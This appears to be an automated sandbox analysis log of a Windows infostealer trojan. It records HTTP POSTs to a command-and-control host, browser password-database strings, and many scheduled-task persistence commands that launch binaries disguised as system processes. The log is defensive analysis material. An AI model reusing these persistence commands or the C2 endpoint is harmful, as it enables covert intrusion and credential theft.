                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1860Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1840Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1848Expect: 100-continueConnection: Keep-Alive
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: global trafficDNS traffic detected: DNS query: 373292cm.nyashka.top
                                    Source: unknownHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2655054570.00000000036C3000.00000004.00000800.00020000.00000000.sdmp, yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2655054570.0000000003582000.00000004.00000800.00020000.00000000.sdmp, yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2655054570.000000000359F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://373292cm.nyashka.top
                                    Source: yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2655054570.00000000034B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://373292cm.nyashka.top/
                                    Source: yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2655054570.0000000003A48000.00000004.00000800.00020000.00000000.sdmp, yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2655054570.00000000036C3000.00000004.00000800.00020000.00000000.sdmp, yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2655054570.0000000003582000.00000004.00000800.00020000.00000000.sdmp, yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2655054570.000000000359F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php
                                    Source: AgentMonitor.exe, 00000006.00000002.1759873239.00000000031DA000.00000004.00000800.00020000.00000000.sdmp, yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2655054570.00000000034B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: Internal.exe, 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.enigmaprotector.com/
                                    Source: Internal.exe, 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.enigmaprotector.com/openU
                                    Source: yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2677065174.0000000013347000.00000004.00000800.00020000.00000000.sdmp, tpiVuHvhdL.16.dr, LCUFrCjzFA.16.dr, rrIxBV7bmT.16.dr, 8GjLo9s3Ra.16.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                    Source: yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2677065174.0000000013347000.00000004.00000800.00020000.00000000.sdmp, tpiVuHvhdL.16.dr, LCUFrCjzFA.16.dr, rrIxBV7bmT.16.dr, 8GjLo9s3Ra.16.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                    Source: yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2677065174.0000000013347000.00000004.00000800.00020000.00000000.sdmp, tpiVuHvhdL.16.dr, LCUFrCjzFA.16.dr, rrIxBV7bmT.16.dr, 8GjLo9s3Ra.16.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                    Source: yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2677065174.0000000013347000.00000004.00000800.00020000.00000000.sdmp, tpiVuHvhdL.16.dr, LCUFrCjzFA.16.dr, rrIxBV7bmT.16.dr, 8GjLo9s3Ra.16.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                    Source: yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2677065174.0000000013347000.00000004.00000800.00020000.00000000.sdmp, tpiVuHvhdL.16.dr, LCUFrCjzFA.16.dr, rrIxBV7bmT.16.dr, 8GjLo9s3Ra.16.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                                    Source: yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2677065174.0000000013347000.00000004.00000800.00020000.00000000.sdmp, tpiVuHvhdL.16.dr, LCUFrCjzFA.16.dr, rrIxBV7bmT.16.dr, 8GjLo9s3Ra.16.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                    Source: yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2677065174.0000000013347000.00000004.00000800.00020000.00000000.sdmp, tpiVuHvhdL.16.dr, LCUFrCjzFA.16.dr, rrIxBV7bmT.16.dr, 8GjLo9s3Ra.16.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                    Source: yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2677065174.0000000013347000.00000004.00000800.00020000.00000000.sdmp, tpiVuHvhdL.16.dr, LCUFrCjzFA.16.dr, rrIxBV7bmT.16.dr, 8GjLo9s3Ra.16.drString found in binary or memory: https://www.ecosia.org/newtab/
                                    Source: yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2677065174.0000000013347000.00000004.00000800.00020000.00000000.sdmp, tpiVuHvhdL.16.dr, LCUFrCjzFA.16.dr, rrIxBV7bmT.16.dr, 8GjLo9s3Ra.16.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Window created: window name: CLIPBRDWNDCLASS

                                    System Summary

                                    Source: Internal.exeStatic PE information: section name:
                                    Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_04AE685B NtQueryInformationProcess,GetSystemInfo,1_2_04AE685B
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: c:\Windows\System32\CSCF64B5552E20A487EA7DE13E15F90A989.TMP
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: c:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File deleted: C:\Windows\System32\CSCF64B5552E20A487EA7DE13E15F90A989.TMP
                                    Source: Internal.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs Internal.exe
                                    Source: Internal.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: AgentMonitor.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: yxeaYbTPMzNPCanFqSswYWhX.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: StartMenuExperienceHost.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: csrss.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: WmiPrvSE.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: Internal.exeStatic PE information: Section: ZLIB complexity 0.997276135089686
                                    Source: Internal.exeStatic PE information: Section: ZLIB complexity 0.9946831597222222
                                    Source: Internal.exeStatic PE information: Section: cheat ZLIB complexity 0.9969861534552845
                                    Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@52/68@1/1
                                    Source: C:\Blockcomcrt\AgentMonitor.exe File created: C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Source: C:\Blockcomcrt\AgentMonitor.exe File created: C:\Users\user\Desktop\cQVCqZDT.log
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:504:120:WilError_03
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3688:120:WilError_03
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-lbrp3oxXXiUX78hSSIVX
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3552:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6120:120:WilError_03
                                    Source: C:\Blockcomcrt\AgentMonitor.exe File created: C:\Users\user\AppData\Local\Temp\yoszi2zi
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Blockcomcrt\nSU3qQKworl3edB45UU9ztPa7aJlyWb1ixvBGEiQTt7.bat" "
                                    Source: C:\Users\user\Desktop\Internal.exeCommand line argument: sfxname1_2_0050DF1E
                                    Source: C:\Users\user\Desktop\Internal.exeCommand line argument: sfxstime1_2_0050DF1E
                                    Source: C:\Users\user\Desktop\Internal.exeCommand line argument: STARTDLG1_2_0050DF1E
                                    Source: C:\Users\user\Desktop\Internal.exeCommand line argument: xzT1_2_0050DF1E
                                    Source: C:\Users\user\Desktop\Internal.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                                    Source: Internal.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\Blockcomcrt\AgentMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Users\user\Desktop\Internal.exe File read: C:\Windows\win.ini
                                    Source: C:\Users\user\Desktop\Internal.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                                    Source: lsdR7GeA5x.16.dr, QwjUqFq2UZ.16.dr, OGRf5Js3co.16.dr, N8x6rZkZOD.16.dr, ieM8OO0J4Y.16.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                    Source: Internal.exeVirustotal: Detection: 68%
                                    Source: Internal.exeReversingLabs: Detection: 76%
                                    Source: C:\Users\user\Desktop\Internal.exe File read: C:\Users\user\Desktop\Internal.exe
                                    Source: unknownProcess created: C:\Users\user\Desktop\Internal.exe "C:\Users\user\Desktop\Internal.exe"
                                    Source: C:\Users\user\Desktop\Internal.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Blockcomcrt\spG4AUp7NlO1gWWyb8eNrRy5s0mKYH4wJzJCIrd.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Blockcomcrt\nSU3qQKworl3edB45UU9ztPa7aJlyWb1ixvBGEiQTt7.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Blockcomcrt\AgentMonitor.exe "C:\Blockcomcrt/AgentMonitor.exe"
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhXy" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe'" /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhX" /sc ONLOGON /tr "'C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe'" /rl HIGHEST /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhXy" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe'" /rl HIGHEST /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yoszi2zi\yoszi2zi.cmdline"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA6D0.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC4F1AC5479EE446D0ADC298BB684B1769.TMP"
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ffrxwzu\1ffrxwzu.cmdline"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA8B5.tmp" "c:\Windows\System32\CSCF64B5552E20A487EA7DE13E15F90A989.TMP"
                                    Source: unknownProcess created: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe "C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe"
                                    Source: unknownProcess created: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe "C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe"
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Blockcomcrt\WmiPrvSE.exe'" /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Blockcomcrt\WmiPrvSE.exe'" /rl HIGHEST /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Blockcomcrt\WmiPrvSE.exe'" /rl HIGHEST /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Recovery\csrss.exe'" /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\csrss.exe'" /rl HIGHEST /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Recovery\csrss.exe'" /rl HIGHEST /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Recent\StartMenuExperienceHost.exe'" /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Users\Default\Recent\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\Users\Default\Recent\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhXy" /sc MINUTE /mo 7 /tr "'C:\Recovery\yxeaYbTPMzNPCanFqSswYWhX.exe'" /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhX" /sc ONLOGON /tr "'C:\Recovery\yxeaYbTPMzNPCanFqSswYWhX.exe'" /rl HIGHEST /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhXy" /sc MINUTE /mo 10 /tr "'C:\Recovery\yxeaYbTPMzNPCanFqSswYWhX.exe'" /rl HIGHEST /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AgentMonitorA" /sc MINUTE /mo 11 /tr "'C:\Blockcomcrt\AgentMonitor.exe'" /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AgentMonitor" /sc ONLOGON /tr "'C:\Blockcomcrt\AgentMonitor.exe'" /rl HIGHEST /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AgentMonitorA" /sc MINUTE /mo 12 /tr "'C:\Blockcomcrt\AgentMonitor.exe'" /rl HIGHEST /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\elmTxMluu5.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: unknownProcess created: C:\Blockcomcrt\AgentMonitor.exe C:\Blockcomcrt\AgentMonitor.exe
                                    Source: unknownProcess created: C:\Blockcomcrt\AgentMonitor.exe C:\Blockcomcrt\AgentMonitor.exe
                                    Source: unknownProcess created: C:\Recovery\csrss.exe C:\Recovery\csrss.exe
                                    Source: unknownProcess created: C:\Recovery\csrss.exe C:\Recovery\csrss.exe
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Blockcomcrt\WmiPrvSE.exe "C:\Blockcomcrt\WmiPrvSE.exe"
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: dhcpcsvc.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: rasapi32.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: rasman.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: rtutils.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: winmm.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: winmmbase.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: mmdevapi.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: devobj.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: ksuser.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: avrt.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: audioses.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: powrprof.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: umpdc.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: msacm32.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: midimap.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: dwrite.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: mscoree.dll
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: version.dll
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: uxtheme.dll
